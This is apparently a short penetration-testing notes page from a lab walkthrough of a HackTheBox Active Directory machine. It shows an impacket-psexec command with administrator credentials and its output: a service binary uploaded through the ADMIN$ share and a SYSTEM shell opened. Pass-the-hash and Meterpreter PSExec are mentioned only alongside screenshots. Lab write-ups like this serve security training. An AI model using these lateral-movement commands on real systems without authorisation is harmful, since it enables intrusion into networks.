# AD Shell

### Getting Shell

Now we have writable shares and credentials so, we can use psexec to get the shell as well.

{% embed url="<https://www.kali.org/tools/impacket-scripts/>" %}

```
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-psexec active.htb/administrator@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file QDdDNPEh.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service REEo on 10.10.10.100.....
[*] Starting service REEo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> 
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F7mp6vEz8KglgyQNN1hvE%2Fimage.png?alt=media&#x26;token=90d96dbe-e749-4afc-9570-1bd2b2ba5d8d" alt=""><figcaption></figcaption></figure>

#### Pass the hash using Psexec

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FLI5eu6ZuBp9oG6tYhdjG%2Fimage.png?alt=media&#x26;token=274bf869-c8da-45c6-88be-6deb6fd1e80b" alt=""><figcaption></figcaption></figure>

### Meterpreter PSExec

We can also use Meterpreter PSexec to connect with the target. Can also pass the hash

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FYQuV6yzzksNi2wA83JXM%2Fimage.png?alt=media&#x26;token=1b02555a-2f3c-40f0-9b52-e2abd7277d54" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FmR1Bh9u90ANh8w4o1Nez%2FScreenshot_17.png?alt=media&#x26;token=d1cf4099-44d1-40cf-8aa7-983d89b92312" alt=""><figcaption></figcaption></figure>